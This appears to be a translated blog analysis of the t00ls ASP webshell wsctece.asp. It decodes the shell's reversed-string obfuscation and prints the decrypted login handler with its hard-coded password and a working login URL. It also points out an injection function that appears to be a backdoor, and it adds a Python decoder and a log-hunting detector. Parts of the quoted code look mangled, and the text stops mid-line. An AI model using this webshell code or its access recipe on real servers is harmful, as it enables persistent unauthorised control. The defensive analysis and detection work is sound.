Full analysis of the decryption, usage and backdoor functions of wsctece.asp from t00ls

Source: Internet
Author: User

From Kingdee blog

How to use the ASP webshell from t00ls.

Analysing a shell requires its source in plain text, so the first step is to decode the webshell.

This is a typical example of the "13 reverse" encoding, with one of the decoder functions mutated to make it harder to recognise.

First, load wsctece.asp into the tool and look at the decoding of the first function, zznFun.
Program code
Function zznFun(zznObjstr): zznObjstr = Replace(zznObjstr, "③", """"): For zznI = 1 To Len(zznObjstr): If Mid(zznObjstr, zznI, 1) <> "1" Then: zznNewStr = Mid(zznObjstr, zznI, 1) & zznNewStr: Else: zznNewStr = vbCrLf & zznNewStr: End If: Next: zznFun = zznNewStr: End Function
The 13 reverse function

This function is applied at two encoding points. Save the decoded result as shellcode.asp.

Next look at another function, UZSS, which is also a 13 reverse decoder. Load shellcode.asp into the tool.

This function is used at many points, 23 in total. Save the result as shellcode1.asp. Now look at the Xo function.
Program code
Function Xo(e): e = R(e, "random", Chr(34)): For psI = 1 To Len(e): If Mid(e, psI, 1) <> "inherit" Then: XoX = Mid(e, psI, 1) & XoX: Else: XoX = vbCrLf & XoX: End If: Next: Xo = XoX: End Function
It also calls a function R. Searching for that function gives:
Program code
Function R(a, B, c): R = Replace(a, B, c): End Function

It is just a wrapper around Replace. Chr(34) is the double-quote character ", so substituting R into Xo gives the following Xo function:
Program code
Function Xo(e): e = Replace(e, "random", Chr(34)): For psI = 1 To Len(e): If Mid(e, psI, 1) <> "inherit" Then: XoX = Mid(e, psI, 1) & XoX: Else: XoX = vbCrLf & XoX: End If: Next: Xo = XoX: End Function

Now it is obvious: this is another 13 reverse function. Decoding it gives the following:

Save the result as shellcode2.asp. This function matters a great deal for the encoding scheme and is analysed further below.

The shell decryption is complete.
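The three decoders above (zznFun, UZSS, Xo) all implement the same transform, so a single offline decoder covers them. The following is an added example, not code from the t00ls shell or from the original post: it reads the scheme off the VBScript (replace the quote marker with ", then walk the string prepending each character, substituting vbCrLf for the line-break marker, which reverses the string) and peels nested layers in the order the shell applies them. The marker values are assumptions: the page shows ③ as the quote marker of zznFun, but its rendering of the line-break marker is garbled, so ① is used here and both are parameters.

```python
"""Offline decoder for the "13 reverse" string obfuscation in wsctece.asp.

Added example; not part of the shell or the original analysis. Marker
characters are analyst-supplied assumptions (③ for quotes is taken from the
page, ① for line breaks is a placeholder).
"""
import re


def decode_layer(blob: str, quote_marker: str, newline_marker: str) -> str:
    """Undo one layer exactly as the VBScript function does.

    VBScript: e = Replace(e, quote_marker, Chr(34)); then for each character
    c: if c <> newline_marker prepend c, else prepend vbCrLf. Prepending each
    token reverses the order, so we collect tokens and reverse once.
    """
    if len(newline_marker) != 1:
        # Mid(e, i, 1) compares one character, so the marker must be one char.
        raise ValueError("line-break marker must be a single character")
    text = blob.replace(quote_marker, '"')
    tokens = ["\r\n" if ch == newline_marker else ch for ch in text]
    tokens.reverse()
    return "".join(tokens)


def decode_layers(blob: str, layers) -> str:
    """Peel nested layers, outermost first.

    `layers` is a list of (quote_marker, newline_marker) pairs in the order
    the shell's decoders run (e.g. zznFun, then UZSS, then Xo).
    """
    for quote_marker, newline_marker in layers:
        blob = decode_layer(blob, quote_marker, newline_marker)
    return blob


# A decoder call such as zznFun("...") can be matched with a plain regex:
# the encoded literal contains no real double quotes, because the encoder
# replaced them with the quote marker.
CALL_RE = re.compile(r'(\w+)\("([^"]*)"\)')


def find_encoded_calls(source: str, decoder_names):
    """Return (decoder_name, encoded_literal) for each call to a known decoder."""
    return [(m.group(1), m.group(2)) for m in CALL_RE.finditer(source)
            if m.group(1) in decoder_names]


# Constructed sample: the plaintext  x = "ok"<CRLF>y = 1  encoded once with
# quote marker ③ and line-break marker ①.
SAMPLE_ENCODED = "1 = y①③ko③ = x"

if __name__ == "__main__":
    print(repr(decode_layer(SAMPLE_ENCODED, "③", "①")))
```

When working on a real file, run find_encoded_calls over the source with the names of the decoders you have identified, decode each literal, and feed the output back through the same step until no decoder calls remain; the marker pair for each layer is read from that layer's Replace and Mid comparison.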

Let's take a look at the usage.

Open shellcode2.asp and search for UserPass or Session. The most reliable way to find a shell's login logic is to locate where the session is set.

Searching for Session turns up the following piece of code.
Program code
If Session("webc0fig") <> UserPass Then
    If Request("ps0") <> "" Then
        If Request("ps0") = UserPass And StrReverse(Replace(Request.ServerVariables("SERVER_NAME"), ".", "")) = Request("c") Then

            A = Trim(Request(""))
            T = Trim(Request("t"))
            P = WWWRoot & p

            If a <> "" And t <> "" Then
                W(0)
                Response.End()

            Function w(zo)
                On Error Resume Next
                If t = 1 Then
                    B = s
                    C = a & s
                    If InStr(M(p, z)(1), s) = 0 Then V(M(p, z)(1) & a, p, z)(1)
                Else
                    B = ""
                    C = ""
                End If

                If V(R(M(p, z)(1), B, c), p, z)(1) Then RRS ""
                If Err.Number = 0 Then
                    RRS "00"
                Else
                    RRS Err.Description
                End If
                Err.Clear
            End Function
            End If

            Session("webc0fig") = UserPass
            Session("idx") = 2
            Session("FolderPath") = ""
            Response.Redirect url
        Else
            Response.End()
        End If

The two functions above are the content that was encoded by the last decoder, Xo.

To make it easier to separate out the two functions, tidy the code:

Program code
If Session("webc0fig") <> UserPass Then
    If Request("ps0") <> "" Then
        If Request("ps0") = UserPass And StrReverse(Replace(Request.ServerVariables("SERVER_NAME"), ".", "")) = Request("c") Then

            A = Trim(Request(""))
            T = Trim(Request("t"))
            P = WWWRoot & p
            If a <> "" And t <> "" Then
                W(0)
                Response.End()
            End If
            Session("webc0fig") = UserPass
            Session("idx") = 2
            Session("FolderPath") = ""
            Response.Redirect url
        Else
            Response.End()
        End If

This is the shell's login handler. The login succeeds only when both request("ps0") = UserPass and StrReverse(Replace(request.ServerVariables("SERVER_NAME"), ".", "")) = request("c") hold.
Searching for UserPass finds it at the end of the file:
Program code
Sub ps(): z = "GB2312": UserPass = "0dlm1c1gi0hr": s = "</body>": p = "index.asp": End Sub
So the password is 0dlm1c1gi0hr. This step is important; it is the basis for the analysis that follows.
What does StrReverse(Replace(Request.ServerVariables("SERVER_NAME"), ".", "")) do? It removes the dots from the domain name and then reverses it.

For example, www.daokers.com becomes mocsrekoadwww. The shell is therefore used as follows.
Taking a local run as an example: http://localhost/shellcode2.asp?ps0=0dlm1c1gi0hr&c=tsohlacol
This brings up the shell's interface.
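The login condition just described is a usable detection signature: the c parameter must equal the server's own host name with the dots removed and the string reversed, and that half of the check does not depend on the password, so it still fires if an operator has changed UserPass or renamed the file. The following is an added example, not part of the original analysis, that applies this rule to IIS W3C log lines. The field layout and the log lines are constructed for the example (cs-host is an optional IIS field; the real column order comes from the #Fields: header of your own logs); the only page-derived values are the hard-coded password and the two host-name examples.

```python
"""Hunt for the wsctece.asp login handshake in IIS W3C log lines.

Added example; the log format and sample lines are constructed. The rule is
read from the decoded shell: request("ps0") = UserPass AND request("c") =
StrReverse(Replace(SERVER_NAME, ".", "")).
"""
from urllib.parse import parse_qs

# Constructed field order; take the real one from the log's #Fields: header.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-host",
          "cs-uri-stem", "cs-uri-query", "sc-status"]

# Password recovered from the shell's ps() sub. Secondary indicator only,
# since a deployed copy may have a different password.
KNOWN_SHELL_PASSWORD = "0dlm1c1gi0hr"


def expected_c_value(server_name: str) -> str:
    """Python mirror of StrReverse(Replace(SERVER_NAME, ".", ""))."""
    return server_name.replace(".", "")[::-1]


def parse_line(line: str):
    """Split one W3C line into a dict, or None if the column count is off."""
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def check_request(rec: dict):
    """Return the reasons this request matches the shell login, or []."""
    reasons = []
    raw_query = rec["cs-uri-query"]
    query = parse_qs(raw_query, keep_blank_values=True) if raw_query != "-" else {}
    ps0 = query.get("ps0", [""])[0]
    c = query.get("c", [""])[0]
    # Password-independent half of the condition: strongest signal.
    if ps0 and c and c == expected_c_value(rec["cs-host"]):
        reasons.append("c= is the reversed, dot-stripped host name, sent with ps0=")
    if ps0 == KNOWN_SHELL_PASSWORD:
        reasons.append("ps0= equals the hard-coded wsctece.asp password")
    return reasons


def scan(lines):
    """Yield (client ip, uri stem, reasons) for each matching request."""
    hits = []
    for line in lines:
        if line.startswith("#"):
            continue
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = check_request(rec)
        if reasons:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], reasons))
    return hits


# Constructed sample log: a benign request, the page's localhost example, and
# a login against a renamed copy of the shell with a changed password.
SAMPLE_LOG = [
    "#Fields: " + " ".join(FIELDS),
    "2024-01-01 10:00:00 10.0.0.9 GET www.daokers.com /index.asp - 200",
    "2024-01-01 10:00:05 10.0.0.9 GET localhost /shellcode2.asp ps0=0dlm1c1gi0hr&c=tsohlacol 200",
    "2024-01-01 10:00:09 10.0.0.9 GET www.daokers.com /images/logo.asp ps0=otherpass&c=mocsrekoadwww 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the sample, the second and third requests are flagged; the third matches on the host-name rule alone, which is the case a password-only indicator would miss. If cs-host is not logged, compute expected_c_value for each host name the site answers to and compare against all of them.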


For more information, see the following.

Normally, once the login succeeds and the session has been assigned, the handler's job is done. Here, however, there is one more thing:
Program code
If a <> "" And t <> "" Then
    W(0)
    Response.End()
End If

This calls the function W, which in turn involves two further functions, V and M. Both are located at the beginning of the file; we bring them up alongside W and move the code of W outside the If block.
After this adjustment the code is:
Program code
If Session("webc0fig") <> UserPass Then
    If Request("ps0") <> "" Then
        If Request("ps0") = UserPass And StrReverse(Replace(Request.ServerVariables("SERVER_NAME"), ".", "")) = Request("c") Then
            A = Trim(Request(""))
            T = Trim(Request("t"))
            P = WWWRoot & p
            If a <> "" And t <> "" Then
                W(0)
                Response.End()
            End If
            Session("webc0fig") = UserPass
            Session("idx") = 2
            Session("FolderPath") = ""
            Response.
